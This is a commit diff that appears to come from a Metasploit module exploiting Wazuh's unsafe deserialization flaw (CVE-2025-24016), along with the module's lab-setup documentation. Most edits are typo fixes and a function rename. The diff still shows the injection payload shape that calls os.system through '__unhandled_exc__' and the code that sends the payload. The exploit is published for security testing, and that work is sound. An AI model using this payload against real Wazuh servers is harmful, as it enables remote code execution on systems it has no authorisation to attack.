update module + documentation based on review comments

Author: h00die-gr3y

documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md

@@ -1,7 +1,7 @@
 ## Vulnerable Application
 Wazuh is a free and open source platform used for threat prevention, detection, and response.
 Starting in version `4.4.0` and prior to version `4.9.1`, an unsafe deserialization vulnerability allows for remote code
-execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` in
+execution on Wazuh servers. DistributedAPI parameters are serialized as JSON and deserialized using `as_wazuh_object` in
 `/var/ossec/framework/wazuh/core/cluster/common.py`. If an attacker manages to inject an unsanitized dictionary in DAPI
 request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
 The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or,
@@ -16,25 +16,9 @@ See also this [attackerkb article](https://attackerkb.com/topics/piW0q4r5Uy/cve-
 ### Installation steps to install the Wazuh Server application
 * Install `Docker` on your preferred platform.
 * Here are the installation instructions for [Docker Desktop on MacOS](https://docs.docker.com/desktop/install/mac-install/).
-* Create a empty directory (`wazuh-docker`).
-* Create the `generate-indexer-certs.yml` file in the directory.
-```yaml
- # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
-version: '3'
-
-services:
-  generator:
-    image: wazuh/wazuh-certs-generator:0.0.2
-    hostname: wazuh-certs-generator
-    volumes:
-      - ./config/wazuh_indexer_ssl_certs/:/certificates/
-      - ./config/certs.yml:/config/certs.yml
-```
-* Run the certificate creation script.
-```
-docker-compose -f generate-indexer-certs.yml run --rm generator
-```
-* Create the following `docker-compose.yml` file in the directory. This will automatically create a Wazuh server multi-node cluster.
+* Follow the steps to install [Wazuh multi-node](https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html).
+* Change the `docker-compose.yml` file in the `multi-node` directory by adding the line `- "56000:55000"` to the ports configuration
+* of the wazuh.worker section to expose port `55000` to the outside world on port `56000`.
 * You can modify the `4.8.2` version in the `yml` file to pull different versions.
 ```yaml
  # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)

modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb

@@ -17,7 +17,7 @@ def initialize(info = {})
         'Description' => %q{
           Wazuh is a free and open source platform used for threat prevention, detection, and response.
           Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
-          allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized
+          allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized
           as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
           If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
           forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
@@ -101,7 +101,7 @@ def get_wazuh_version(api_token)
   end
 
   # CVE-2025-24016: Command Injection leading to RCE via unsafe deserialization vulnerability
-  def execute_command(cmd, _opts = {})
+  def execute_payload(cmd, _opts = {})
     # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
     post_data = {
       __unhandled_exc__: {
@@ -139,6 +139,6 @@ def check
 
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-    execute_command(payload.encoded)
+    execute_payload(payload.encoded)
   end
 end